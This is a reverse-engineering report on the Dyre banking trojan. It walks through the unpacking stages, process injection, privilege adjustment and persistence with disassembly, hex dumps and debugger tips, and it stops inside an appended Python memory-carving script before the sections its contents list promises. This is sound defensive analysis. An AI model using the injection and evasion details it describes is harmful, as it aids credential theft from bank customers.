Dyre Infection Analysis by Alexander Hanel 2014/11/24 Version 1.0 [email protected]


Contents

  Executive Summary
  Introduction
    Family Name
    Propagation
    Sample Analyzed
  Installation
    Stage 1
    Stage 2
    Stage 3
    Stage 4
    Stage 5
    Stage 6
    Stage 7
  General Details and Functionality
    Persistence
      Registry
        Service
        Run Key
      Dropped Files
        Service
      Pipes
      Mutex
    Functionality Overview
      Enumerating processes
      Process Injection
      Host IP Retrieval
      VNC
      Commands & Configurations
      Error Codes
    Hooks
      FireFox Hooks
      Internet Explorer Hooks
      Chrome Hooks
    Anti-Detection functionality
      Disabling RapportGP
    Command and Control
      Third Party Resources
      URLs & IPs
      Network Traffic Patterns
  Appendix: Strings
    Stage 6 Dyre
    Stage 7 Injected Process
  Third Party Analysis

Executive Summary

This document is an analysis of the Dyre banking malware. It is intended to aid in understanding how Dyre executes and interacts with the operating system. The target audience is malware analysts, reverse engineers, system administrators, incident responders and forensic investigators. Hopefully an individual investigating an incident could use this document to determine if the infection is Dyre or not.

Introduction

Dyre is a banking trojan that was first seen in June of 2014. In terms of banking malware the family is rather recent. Most organizations and email providers have been hit with spam campaigns that either link to an exploit kit that drops Dyre or carry a zip attachment that contains a Dyre executable. This document covers the features of Dyre that I found interesting. Due to the size of the code not all features are covered. The sample I originally started with was an older sample. Newer samples that dropped a service crashed in my test environment. If you would like to contribute to this report please shoot me an email.

Family Name

  Dyre, Dyreza, Dyzap, Battdil

Propagation

Dyre is usually downloaded by a lightweight trojan downloader named Upatre. The two families share the same packer/obfuscation. As of the time of this writing, Upatre is most commonly executed by users being social engineered to open a zip file and execute its contents. The user will receive an email masquerading as being from a known entity such as Wells Fargo, the IRS, Amazon, etc. The email will request the user to open the attachment. Once opened it will download Dyre.

Sample Analyzed

  File Hash                    099c36d73cad5f13ec1a89d5958486060977930b8e4d541e4a2f7d92e104cd21
  File Size                    440 kB
  File Modification Date/Time  2014:09:20 22:28:00-04:00
  File Access Date/Time        2014:11:11 17:28:16-05:00
  File Creation Date/Time      2014:11:11 17:25:43-05:00
  File Type                    Win32 EXE
  MIME Type                    application/octet-stream
  Machine Type                 Intel 386 or later, and compatibles


  Time Stamp                   2014:08:14 08:46:22-04:00
  PE Type                      PE32
  Linker Version               6.2
  Code Size                    376832
  Initialized Data Size        73728
  Uninitialized Data Size      0
  Entry Point                  0x3eec3
  OS Version                   4.0
  Image Version                0.0
  Subsystem Version            4.0
  Subsystem                    Windows GUI
  File Version Number          2.4.0.8376
  Product Version Number       2.4.0.8376
  File Flags Mask              0x0000
  File Flags                   (none)
  File OS                      Windows NT 32-bit
  Object File Type             Executable application
  File Subtype                 0
  Language Code                English (U.S.)
  Character Set                Windows, Latin1
  File Description             ViewerPDF
  File Version                 2.4.0.8376
  Legal Copyright              Copyright 2006-2013 all authors (GPLv3)
  Original Filename            ViewerPDF.exe
  Product Name                 ViewerPDF
  Product Version              2.4.0.8376

Installation

Dyre executes in seven stages. In order to understand the installation process it is useful to know the different stages. Knowing these stages can also aid in detection.

  Stage  Description
  1      Executable on disk, not executed.
  2      The sample is loaded in memory, executing and modifying its own memory.
  3      Position independent code running in allocated memory to decode the original Dyre installer.
  4      Dyre installer.
  5      Position independent code injected into svchost.exe or explorer.exe.
  6      Dyre injected DLL running in svchost.exe or explorer.exe. **
  7      Injected DLL running in browser memory space. **

** The DLL will not show up as a loaded module.

Note: The below stages were based off of one variant. Details such as folder paths, file names or injected processes vary. The General Details and Functionality section is written to cover more indicators of the different variants.

Stage 1

As previously mentioned Upatre and Dyre share the same obfuscation tool. In this stage the samples are very similar except for a couple of differences. The most notable difference is the imports. Below are the imports for Upatre. Most of the MSVCRT APIs are invoked during WinMain. Note: Parts of this can be a little esoteric and may only be interesting to myself and/or others who like to understand file randomization.

  Address   Ordinal  Name                 Library
  00403000           SetBkColor           GDI32
  00403008           GetStartupInfoA      KERNEL32
  0040300C           GetModuleHandleA     KERNEL32
  00403010           GetModuleHandleW     KERNEL32
  00403014           CloseHandle          KERNEL32
  00403018           CreateFileW          KERNEL32
  0040301C           WriteFile            KERNEL32
  00403020           ReadFile             KERNEL32
  00403028           __getmainargs        MSVCRT
  0040302C           _controlfp           MSVCRT
  00403030           _except_handler3     MSVCRT
  00403034           __set_app_type       MSVCRT
  00403038           __p__fmode           MSVCRT
  0040303C           __p__commode         MSVCRT
  00403040           _adjust_fdiv         MSVCRT
  00403044           __setusermatherr     MSVCRT
  00403048           _exit                MSVCRT
  0040304C           _XcptFilter          MSVCRT
  00403050           exit                 MSVCRT
  00403054           _acmdln              MSVCRT
  00403058           _initterm            MSVCRT
  00403060           RegisterClassExW     USER32
  00403064           CreateWindowExW      USER32
  00403068           GetMessageW          USER32
  0040306C           TranslateMessage     USER32
  00403070           DispatchMessageW     USER32
  00403074           DefWindowProcW       USER32
  00403078           PostQuitMessage      USER32
  0040307C           ShowWindow           USER32
  00403080           UpdateWindow         USER32
  00403084           SetWindowTextW       USER32
  00403088           PostMessageW         USER32

If you have read my Upatre Sample Set Analysis a number of these APIs will look familiar: GetModuleHandleA, GetStartupInfoA, EnableWindow, etc. Below are the imports for Dyre.

  Address   Ordinal  Name                                               Library
  0045D000           GetModuleHandleA                                   KERNEL32
  0045D004           GetStartupInfoA                                    KERNEL32
  0045D2F8  6336     __imp_?UpdateFrameCounts@CDocument@@UAEXXZ         MFC42
  0045D05C  5577     __imp_?ReleaseFile@CDocument@@UAEXPAVCFile@@H@Z    MFC42
  ...
  0045D078  5241     ?PostNcDestroy@CWnd@@MAEXXZ                        MFC42
  0045D074  4396     __imp_?OnChildNotify@CButton@@MAEHIIJPAJ@Z         MFC42
  0045D0DC  4108     __imp_?IsSelected@CView@@UBEHPBVCObject@@@Z        MFC42
  0045D06C  4242     ?messageMap@CFrameWnd@@1UAFX_MSGMAP@@B             MFC42
  0045D068  1842     ?classCFrameWnd@CFrameWnd@@2UCRuntimeClass@@B      MFC42
  0045D064  5740     __imp_?SaveModified@CDocument@@UAEHXZ              MFC42
  ...
  0045D354           _setmbcp                                           MSVCRT
  0045D350           ??2@YAPAXI@Z                                       MSVCRT
  ...
  0045D310           _except_handler3                                   MSVCRT
  0045D30C           _controlfp                                         MSVCRT
  0045D368           EnableWindow                                       USER32
  0045D364           SendMessageA                                       USER32
  0045D360           UpdateWindow                                       USER32
  0045D35C           LoadCursorA                                        USER32

One noticeable difference between the two sets is that the Microsoft Foundation Class library has been included. Most of the APIs from the library are never called. The purpose of importing the APIs is to add more data and code to help randomize the executable against hashing. This is a good example of why relying on hashing of APIs is not always a good idea for clustering families. The authors of the obfuscation tool used by Upatre and Dyre have also added slight variations through pointer arithmetic to randomize the code.

Upatre

  .text:0040106F _GetImageOptionalHeaderAddress proc near
  .text:0040106F     mov     ecx, [eax+3Ch]          ; note: 0x3C (e_lfanew)
  .text:00401072     mov     [ebp-4], eax
  .text:00401075     and     ecx, 0FFFFh
  .text:0040107B     add     eax, ecx
  .text:0040107D     mov     ecx, 18h
  .text:00401082     add     eax, ecx
  .text:00401084     inc     ecx
  .text:00401085     add     ecx, 0F0h
  .text:0040108B     retn
  .text:0040108B _GetImageOptionalHeaderAddress endp

Dyre

  .text:004469B0 _GetImageOptionalHeaderAddress proc near

  .text:004469B0     mov     [ebp-4], eax
  .text:004469B3     xor     ecx, ecx
  .text:004469B5     inc     eax                     ; inc eax so [EAX+3Bh] equals [EAX+3Ch]
  .text:004469B6     mov     cx, [eax+3Bh]
  .text:004469BA     add     eax, ecx
  .text:004469BC     dec     eax
  .text:004469BD     mov     ecx, 18h
  .text:004469C2     add     eax, ecx
  .text:004469C4     inc     ecx
  .text:004469C5     add     ecx, 0F0h
  .text:004469CB     retn
  .text:004469CB _GetImageOptionalHeaderAddress endp

Stage 2

  .text:0044F240 sub_44F240 proc near                ; CODE XREF:
  .text:0044F240     push    ebp                     ; count: 1
  .text:0044F241     mov     ebp, esp                ; count: 1
  .text:0044F243     push    offset _call_decoder    ; count: 1
  .text:0044F248     call    _atexit                 ; count: 1
  .text:0044F24D     add     esp, 4                  ; count: 1
  .text:0044F250     pop     ebp                     ; count: 1
  .text:0044F251     retn                            ; count: 1
  .text:0044F251 sub_44F240 endp

Stage 2 happens after a call to _atexit. This stage will call VirtualProtect and decode stage 3. Calling the _atexit function directly will not work because the sample relies on predicted values generated by calling useless APIs.

Invoked during WinMain:

  .text:00401380     mov     [ebp-34h], eax
  .text:00401383     mov     ecx, [ebp-0ACh]
  .text:00401389     call    ?GetExStyle@CWnd@@QBEKXZ   ; CWnd::GetExStyle(void): retrieves the extended window styles of the window
  .text:0040138E     mov     dword_46C1CC, eax          ; eax = 0x100, WS_EX_WINDOWEDGE

Invoked after _atexit:

  .text:0043EC95     mov     eax, dword_46C1CC
  .text:0043EC9A     sub     eax, 0F9h                  ; 0x100 - 0xf9 = 7
  .text:0043EC9F     call    _thread

  .text:0044A790 _thread proc near                    ; CODE XREF:
  .text:0044A790     mov     ecx, eax                 ; eax = 7
  .text:0044A792     sub     ecx, 7
  .text:0044A795     test    ecx, ecx                 ; ecx = 0
  .text:0044A797     jz      short loc_44A7B5
  .text:0044A799     inc     ecx
  .text:0044A79A     retn
  .text:0044A79A
  .text:0044A79B     db 6Ah
  .text:0044A79C
  .text:0044A79C     jmp     fword ptr [eax+19h]
  .text:0044A79C
  .text:0044A79F     db 77h
  .text:0044A7A0     dd 0A1640052h, 0
  .text:0044A7A8     dd 25896450h, 0
  .text:0044A7B0     dd 68685351h
  .text:0044A7B4     db 0D1h
  .text:0044A7B5
  .text:0044A7B5
  .text:0044A7B5 loc_44A7B5:                          ; CODE XREF: _thread+7j
  .text:0044A7B5     mov     ebp, esp
  .text:0044A7B7     mov     dword_465FE4, esp
  .text:0044A7BD
  .text:0044A7BD loc_44A7BD:                          ; CODE XREF: _thread+45j
  .text:0044A7BD     push    eax
  .text:0044A7BE     mov     eax, offset GetStartupInfoA
  .text:0044A7C3     mov     edx, offset loc_43EB90
  .text:0044A7C8     mov     eax, [eax]
  .text:0044A7CA     mov     dword_465FF0, eax
  .text:0044A7CF     pop     eax
  .text:0044A7D0     add     edx, eax
  .text:0044A7D2     push    edx                      ; 0043EB97
  .text:0044A7D3     test    eax, eax
  .text:0044A7D5     jz      short loc_44A7BD
  .text:0044A7D7     call    dword ptr [ebp-4]        ; 0043EB97
  ...
  .text:0043EB97 _init_decode proc near
  .text:0043EB97     mov     ecx, eax
  .text:0043EB99     push    ecx
  .text:0043EB9A     inc     ecx
  .text:0043EB9B     cmp     ecx, 0Ah
  .text:0043EB9E     jz      sub_4469B0

  .text:0043EBA4     call    sub_4110F0
  .text:0043EBA9     mov     ecx, 42h
  .text:0043EBAE     push    offset unk_46B194
  .text:0043EBB3     lea     esi, dword_43F030
  .text:0043EBB9     dec     ecx
  .text:0043EBBA     dec     ecx
  .text:0043EBBB     push    ecx
  .text:0043EBBC     mov     edx, offset _2ndStage
  .text:0043EBC1     push    edi
  .text:0043EBC2     push    edx
  .text:0043EBC3     jmp     short loc_43EBDE         ; VirtualProtect
  .text:0043EBC5
  .text:0043EBC5
  .text:0043EBC5 loc_43EBC5:                          ; CODE XREF: _init_decode+49j
  .text:0043EBC5     mov     ecx, 127                 ; XOR loop count
  .text:0043EBCA     mov     edi, offset _2ndStage    ; buffer to decode
  .text:0043EBCF     inc     ecx
  .text:0043EBD0     mov     eax, dword_465EA2
  .text:0043EBD5     call    _decode_0
  .text:0043EBDA     pop     eax
  .text:0043EBDB     inc     eax
  .text:0043EBDC     inc     eax
  .text:0043EBDD     retn
  .text:0043EBDE
  .text:0043EBDE
  .text:0043EBDE loc_43EBDE:                          ; CODE XREF: _init_decode+2Cj
  .text:0043EBDE     call    eax                      ; VirtualProtect
  .text:0043EBE0     jmp     short loc_43EBC5
  .text:0043EBE0 _init_decode endp

  .text:00442430 _xor_save proc near                  ; CODE XREF: decode+6p
  .text:00442430     mov     eax, esi
  .text:00442432     mov     eax, [eax]
  .text:00442434     xor     eax, ecx
  .text:00442436     call    save_xored
  .text:0044243B     retn
  .text:0044243B _xor_save endp

RE Notes: To bypass these stages set a breakpoint on VirtualProtectEx, execute, then set a hardware breakpoint on the address whose protection is being changed (lpAddress, the second argument of VirtualProtectEx and the first of VirtualProtect), then execute.

The second stage is responsible for allocating memory, decoding a buffer using the same XOR routine and writing the third stage to that memory. Setting a breakpoint at the last call eax will take us to the third stage. See the below assembly.

Stage 3

  0041F620  55            PUSH EBP
  0041F621  8BEC          MOV EBP,ESP
  0041F623  83C4F4        ADD ESP,-0C
  0041F626  8945F4        MOV DWORD PTR SS:[EBP-C],EAX
  0041F629  8B5D08        MOV EBX,DWORD PTR SS:[EBP+8]
  0041F62C  8B4304        MOV EAX,DWORD PTR DS:[EBX+4]
  0041F62F  50            PUSH EAX                        ; address of string "VirtualAlloc"
  0041F630  8B5320        MOV EDX,DWORD PTR DS:[EBX+20]
  0041F633  8B4210        MOV EAX,DWORD PTR DS:[EDX+10]
  0041F636  50            PUSH EAX
  0041F637  8B4208        MOV EAX,DWORD PTR DS:[EDX+8]
  0041F63A  FFD0          CALL EAX                        ; 00417C60, get import address
  0041F63C  8945F8        MOV DWORD PTR SS:[EBP-8],EAX
  0041F63F  8B4B0C        MOV ECX,DWORD PTR DS:[EBX+C]
  0041F642  C1E90C        SHR ECX,0C
  0041F645  41            INC ECX
  0041F646  C1E10C        SHL ECX,0C                      ; round the size up to a page
  0041F649  33C0          XOR EAX,EAX
  0041F64B  6A40          PUSH 40                         ; PAGE_EXECUTE_READWRITE
  0041F64D  6800100000    PUSH 1000                       ; MEM_COMMIT
  0041F652  51            PUSH ECX
  0041F653  50            PUSH EAX
  0041F654  8B45F8        MOV EAX,DWORD PTR SS:[EBP-8]
  0041F657  FFD0          CALL EAX                        ; VirtualAlloc
  0041F659  85C0          TEST EAX,EAX
  0041F65B  743F          JE SHORT x.0041F69C
  0041F65D  8945FC        MOV DWORD PTR SS:[EBP-4],EAX
  0041F660  8B7DFC        MOV EDI,DWORD PTR SS:[EBP-4]
  0041F663  8B5314        MOV EDX,DWORD PTR DS:[EBX+14]
  0041F666  53            PUSH EBX
  0041F667  8B5B10        MOV EBX,DWORD PTR DS:[EBX+10]
  0041F66A  8B33          MOV ESI,DWORD PTR DS:[EBX]
  0041F66C  0FB70A        MOVZX ECX,WORD PTR DS:[EDX]
  0041F66F  83F900        CMP ECX,0
  0041F672  740A          JE SHORT x.0041F67E
  0041F674  43            INC EBX
  0041F675  43            INC EBX
  0041F676  43            INC EBX
  0041F677  43            INC EBX
  0041F678  42            INC EDX
  0041F679  42            INC EDX
  0041F67A  F3:A4         REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]   ; copy data to the new memory
  0041F67C  ^EBEC         JMP SHORT x.0041F66A
  0041F67E  5B            POP EBX
  0041F67F  8B7DFC        MOV EDI,DWORD PTR SS:[EBP-4]
  0041F682  8B7318        MOV ESI,DWORD PTR DS:[EBX+18]
  0041F685  8B431C        MOV EAX,DWORD PTR DS:[EBX+1C]
  0041F688  8B4B0C        MOV ECX,DWORD PTR DS:[EBX+C]
  0041F68B  8B5308        MOV EDX,DWORD PTR DS:[EBX+8]
  0041F68E  FFD2          CALL EDX

... rebuild the import table, change the memory rights and then free the memory. Once this is completed it will jump to the next stage.

RE Notes: An easy way to carve out the executable is to set a breakpoint on UnmapViewOfFile, execute, then set a breakpoint on VirtualFree, execute, then dump the memory that is being freed.

Stage 4

The fourth stage is the Dyre dropper. The entry point will look something like this. Notice that EIP points to an area of memory at the original base address.

  .text:004025D0     push    ebp
  .text:004025D1     mov     ebp, esp
  .text:004025D3     and     esp, 0FFFFFFF8h
  .text:004025D6     sub     esp, 5D4h
  .text:004025DC     push    ebx
  .text:004025DD     push    esi
  .text:004025DE     push    edi
  .text:004025DF     push    168h                     ; nSize
  .text:004025E4     lea     eax, [esp+5E4h+Data]
  .text:004025EB     push    eax                      ; lpFilename
  .text:004025EC     push    0                        ; hModule
  .text:004025EE     call    ds:GetModuleFileNameW
  .text:004025F4     cmp     hHeap, 0
  .text:004025FB     jnz     short loc_402618
  .text:004025FD     push    0                        ; dwMaximumSize
  .text:004025FF     push    400000h                  ; dwInitialSize
  .text:00402604     push    40000h                   ; flOptions
  .text:00402609     call    ds:HeapCreate
  .text:0040260F     mov     hHeap, eax
  .text:00402614     test    eax, eax

Note: The below process varies between versions. See the Dropped Files section for variations on dropped files.

The sample will check that it is running in the Application Data folder by calling SHGetFolderPath with CSIDL_APPDATA. If the sample is running on Windows Vista or later it will be running from %USERPROFILE%\AppData\Roaming; if lower than Vista, from %USERPROFILE%\Application Data. If the sample is not running in %APPDATA% it will generate a random 15 character string and concatenate it with ".exe":

  DDoKxGmEEQspft.exe
  QLysiyFCqsHTenS.exe
  rJSyaumrkjfVcxY.exe
  wHepYHNuahJReRa.exe
  XMoVNxUrnyNxMnH.exe
  yDDoKxGmEEQspft.exe

It will then write itself to %APPDATA% and execute the copy with its own file path as an argument. If the sample is already running from %APPDATA% it will check a mutex (OpenMutexW) to see that only one instance is executing.

  .text:004026E8     push    offset aGlobal553wwerd   ; "Global\\553wwerdty7"
  .text:004026ED     push    0                        ; bInheritHandle
  .text:004026EF     push    100000h                  ; dwDesiredAccess
  .text:004026F4     call    ds:OpenMutexW

If the sample is executing for the first time it will delete the previously run executable. The sample will then create a run key.

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  @="C:\\Documents and Settings\\Administrator\\Application Data\\XMoVNxUrnyNxMnH.exe"

Creating rules to detect the creation of autorun registry keys that point to files in %APPDATA% is an easy way to identify suspicious executables from a HIPS or Windows events perspective.

After the registry key is written the sample will call IsWow64Process to identify if it is running on a 64-bit system. It will then create a file mapping of a resource and adjust its privileges to "SeDebugPrivilege". Once completed it will call CreateToolhelp32Snapshot to search for "svchost.exe". If the process is running as NT AUTHORITY\SYSTEM (the token's user SID equals the well known LocalSystem SID) it will inject into the process.

  .text:00401388     push    eax                      ; pSid
  .text:00401389     push    ebx                      ; DomainSid
  .text:0040138A     push    WinLocalSystemSid        ; WellKnownSidType
  .text:0040138C     mov     [ebp+cbSid], 44h
  .text:00401393     call    ds:CreateWellKnownSid    ; creates a SID for a predefined alias
  ...
  .text:004013AA     push    ecx                      ; ReturnLength
  .text:004013AB     push    ebx                      ; TokenInformationLength
  .text:004013AC     push    ebx                      ; TokenInformation
  .text:004013AD     push    1                        ; TokenInformationClass (TokenUser)
  .text:004013AF     push    edx                      ; TokenHandle
  .text:004013B0     mov     [ebp+ReturnLength], ebx
  .text:004013B3     call    edi                      ; GetTokenInformation
  .text:004013B5     call    ds:GetLastError
  .text:004013BB     cmp     eax, ERROR_INSUFFICIENT_BUFFER
  ...
  .text:004013F1     lea     edx, [ebp+pSid]
  .text:004013F4     push    edx                      ; pSid2
  .text:004013F5     push    eax                      ; pSid1
  .text:004013F6     call    ds:EqualSid

Once the process is injected it will open the mutex it created earlier. Once this stage is completed it will call ExitProcess.

Stage 5

The entry point of the injected process is not the entry point of the executable but the base address of the allocated memory. The first 0x640 bytes of the memory block contain position independent code that is responsible for loading and rebuilding the import table for an executable that follows the code. This approach is notable because any executable file can be injected into a process. The embedded executable does not need to be modified to include position independent code functionality.

  Offset(h)  00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
  00000000   55 89 E5 57 56 51 52 53 8B 75 08 E8 EA 01 00 00   U..WVQRS.u......
  00000010   89 C3 8D 46 61 50 53 E8 D0 02 00 00 55 8D 6E 51   ...FaPS.....U.nQ
  00000020   89 45 04 89 5D 00 8D 86 47 06 00 00 89 45 08 8B   .E..]...G....E..
  00000030   86 43 06 00 00 89 45 0C E8 47 01 00 00 8D 86 87   .C....E..G......
  00000040   03 00 00 FF D0 5D 31 C0 5B 5A 59 5E 5F C9 C2 0C   .....]1.[ZY^_...
  00000050   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
  00000060   00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00   .GetProcAddress.

  seg000:00920000  55                 push    ebp
  seg000:00920001  89 E5              mov     ebp, esp
  seg000:00920003  57                 push    edi
  seg000:00920004  56                 push    esi
  seg000:00920005  51                 push    ecx
  seg000:00920006  52                 push    edx
  seg000:00920007  53                 push    ebx
  seg000:00920008  8B 75 08           mov     esi, [ebp+arg_0]
  seg000:0092000B  E8 EA 01 00 00     call    GetKernelBase
  seg000:00920010  89 C3              mov     ebx, eax
  seg000:00920012  8D 46 61           lea     eax, [esi+61h]
  seg000:00920015  50                 push    eax                  ; "GetProcAddress"
  seg000:00920016  53                 push    ebx
  seg000:00920017
  seg000:00920017 loc_920017:
  seg000:00920017  E8 D0 02 00 00     call    _IAT_Lookup
  seg000:0092001C  55                 push    ebp
  seg000:0092001D  8D 6E 51           lea     ebp, [esi+51h]
  seg000:00920020  89 45 04           mov     [ebp+4], eax
  seg000:00920023  89 5D 00           mov     [ebp+var_s0], ebx
  seg000:00920026  8D 86 47 06 00+    lea     eax, [esi+647h]      ; MZ header

The memory of the injected process can be identified by the RWX rights.

  Private (Commit)   0x630000    124 kB    RWX   Loader Code
  Mapped (Commit)    0xf00000    104 kB    RWX   DLL
  Private (Commit)   0x2410000   3.48 MB   RWX   DATA
  Private (Commit)   0x2792000   504 kB    RWX   DATA

Stage 6

The loaded executable will not contain the position independent code. It will start with the standard MZ header.

  Offset(h)  00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
  00000000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00   MZ..............
  00000010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00   ........@.......
  00000020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
  00000030   00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00   ................
  00000040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68   ........!..L.!Th
  00000050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F   is program canno
  00000060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20   t be run in DOS 
  00000070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00   mode....$.......
  00000080   08 EE 31 68 4C 8F 5F 3B 4C 8F 5F 3B 4C 8F 5F 3B   ..1hL._;L._;L._;
  00000090   45 F7 CC 3B 59 8F 5F 3B 4C 8F 5E 3B 8D 8F 5F 3B   E..;Y._;L.^;.._;
  000000A0   23 F9 F0 3B 64 8F 5F 3B 23 F9 C1 3B 4D 8F 5F 3B   #..;d._;#..;M._;
  000000B0   23 F9 C2 3B 4D 8F 5F 3B 52 69 63 68 4C 8F 5F 3B   #..;M._;RichL._;
  000000C0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

Note: The C2 can be parsed out of DATA memory.

Checks if a hardcoded mutex string is present to determine if it is already running. The mutex string is a variation of the author pressing random chars on the keyboard with their left hand: "Global\\553wwerdty7". Other examples of this can be seen in the name of the log file "d6r5g4da.db" and the named RCDATA (raw data) resource "u1xdfy2dv". The named resources are used to store the initial config file and the injected code.

Creates a configuration file in the %APPDATA% directory:

  Offset(h)  00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
  00000000   05 00 62 6F 74 69 64 39 00 00 00 55 53 45 52 35   ..botid9...USER5
  00000010   34 4B 39 2D 33 44 38 46 36 41 5F 57 35 31 32 36   4K9-3D8F6A_W5126
  00000020   30 30 2E 42 44 36 32 46 46 39 38 30 45 35 38 30   00.BD62FF980E580
  00000030   37 34 36 37 33 41 38 39 45 41 31 46 41 38 34 35   74673A89EA1FA845
  00000040   46 43 38 00 50 02 71 A8 8B BD A0 5E 04 56 F2 60   FC8.P.q....^.V.`
  00000050   03 E3 E4 25 50 76 36 6F 97 A4 D7 06 88 18 F6 7C   ...%Pv6o.......|
  00000060   E2 2F 1B F8                                       ./..

Adjusts its token to have SeDebugPrivilege:

  .text:10004646     call    ds:GetCurrentProcess
  .text:1000464C     push    eax                      ; ProcessHandle
  .text:1000464D     call    ds:OpenProcessToken
  .text:10004653     test    eax, eax
  .text:10004655     jz      short loc_10004696
  .text:10004657     lea     eax, [ebp+NewState.Privileges]
  .text:1000465A     push    eax                      ; lpLuid
  .text:1000465B     push    offset aSedebugprivile   ; "SeDebugPrivilege"
  .text:10004660     push    esi                      ; lpSystemName
  .text:10004661     mov     [ebp+NewState.PrivilegeCount], 1
  .text:10004668     call    ds:LookupPrivilegeValueW
  .text:1000466E     test    eax, eax
  .text:10004670     jz      short loc_1000468D
  .text:10004672     push    esi                      ; ReturnLength
  .text:10004673     push    esi                      ; PreviousState
  .text:10004674     push    10h                      ; BufferLength
  .text:10004676     lea     eax, [ebp+NewState]
  .text:10004679     push    eax                      ; NewState
  .text:1000467A     push    esi                      ; DisableAllPrivileges
  .text:1000467B     push    [ebp+hObject]            ; TokenHandle
  .text:1000467E     mov     [ebp+NewState.Privileges.Attributes], 2   ; SE_PRIVILEGE_ENABLED
  .text:10004685     call    ds:AdjustTokenPrivileges
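Stages 5 and 6 boil down to two things an analyst can key on in a memory dump: a position independent loader at the start of an RWX region, and a plain PE image (MZ header) a fixed distance behind it, which the RE note for stage 3 suggests dumping when it is freed. The Python below is an added example for this report, not code from the report or from Dyre; it finds the loader by the prologue bytes shown in the stage 5 hex dump (55 89 E5 57 56 51 52 53 8B 75 08 E8 with "GetProcAddress" at +0x61), then locates and carves every valid PE image in the region using the header fields instead of guessing a size. The 0x647 distance is taken from the listing's lea eax, [esi+647h]; the dumped region is a constructed one built by build_test_pe and build_test_region.

```python
"""Carve PE images out of an RWX region dumped from a Dyre-injected process.

Added example for this report; the region it runs on is constructed, not real Dyre data.
"""
import struct

# First 12 bytes of the stage 5 loader in the hex dump above, and the "GetProcAddress"
# string the loader references at esi+61h. lea eax, [esi+647h] points at the MZ header.
LOADER_PROLOGUE = bytes.fromhex("5589e557565152538b7508e8")
LOADER_STRING_OFF = 0x61
LOADER_PE_OFF = 0x647
FILE_ALIGN, SECT_ALIGN = 0x200, 0x1000


def find_loader(region):
    """Offset of the stage 5 position independent loader in the region, or -1."""
    pos = region.find(LOADER_PROLOGUE)
    while pos != -1:
        s = pos + LOADER_STRING_OFF
        if region[s:s + 15] == b"GetProcAddress\0":
            return pos
        pos = region.find(LOADER_PROLOGUE, pos + 1)
    return -1


def parse_pe(region, off):
    """Validate an MZ/PE32 header at `off` and return its geometry, or None."""
    if region[off:off + 2] != b"MZ" or off + 0x40 > len(region):
        return None
    e_lfanew = struct.unpack_from("<I", region, off + 0x3C)[0]
    pe = off + e_lfanew
    if e_lfanew > 0x400 or pe + 24 > len(region) or region[pe:pe + 4] != b"PE\0\0":
        return None
    _, nsect, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", region, pe + 4)
    opt = pe + 24
    sect_tbl = opt + opt_size
    if nsect == 0 or nsect > 96 or opt + 0x3C > len(region) or sect_tbl + 40 * nsect > len(region):
        return None
    if struct.unpack_from("<H", region, opt)[0] != 0x10B:      # PE32 only; Dyre is 32-bit
        return None
    size_of_image = struct.unpack_from("<I", region, opt + 0x38)[0]
    sections, raw_end = [], 0
    for i in range(nsect):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", region, sect_tbl + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize, rptr, rsize))
        raw_end = max(raw_end, rptr + rsize)
    return {"offset": off, "timestamp": stamp, "size_of_image": size_of_image,
            "raw_size": raw_end, "sections": sections}


def carve_images(region):
    """Every valid PE image in the region. A file image (the stage 5 payload) ends at the
    last section's raw data; a mapped image (stage 6 DLL) spans size_of_image instead."""
    found, pos = [], region.find(b"MZ")
    while pos != -1:
        info = parse_pe(region, pos)
        if info:
            info["file_bytes"] = region[pos:pos + info["raw_size"]]
            found.append(info)
            pos = region.find(b"MZ", pos + max(info["raw_size"], 2))
        else:
            pos = region.find(b"MZ", pos + 1)
    return found


def build_test_pe(timestamp, sections):
    """Constructed minimal PE32 file image used as test input (not a real sample)."""
    nsect, opt_size = len(sections), 0xE0
    size_of_headers = (0x40 + 24 + opt_size + 40 * nsect + FILE_ALIGN - 1) & ~(FILE_ALIGN - 1)
    hdr = bytearray(size_of_headers)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                        # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, nsect, timestamp, 0, 0, opt_size, 0x0102)
    opt = 0x40 + 24
    struct.pack_into("<H", hdr, opt, 0x10B)                        # PE32 magic
    struct.pack_into("<II", hdr, opt + 0x20, SECT_ALIGN, FILE_ALIGN)
    body, raw_ptr, va = b"", size_of_headers, SECT_ALIGN
    for i, (name, data) in enumerate(sections):
        rsize = (len(data) + FILE_ALIGN - 1) & ~(FILE_ALIGN - 1)
        struct.pack_into("<8sIIIIIIHHI", hdr, opt + opt_size + 40 * i,
                         name, len(data), va, rsize, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(rsize, b"\0")
        raw_ptr += rsize
        va += (len(data) + SECT_ALIGN - 1) & ~(SECT_ALIGN - 1)
    struct.pack_into("<II", hdr, opt + 0x38, va, size_of_headers)  # SizeOfImage, SizeOfHeaders
    return bytes(hdr) + body


def build_test_region(pe):
    """Constructed RWX region: loader stub first, the PE at +0x647 as in the listing."""
    loader = bytearray(LOADER_PE_OFF)
    loader[:len(LOADER_PROLOGUE)] = LOADER_PROLOGUE
    loader[LOADER_STRING_OFF:LOADER_STRING_OFF + 15] = b"GetProcAddress\0"
    return bytes(loader) + pe


if __name__ == "__main__":
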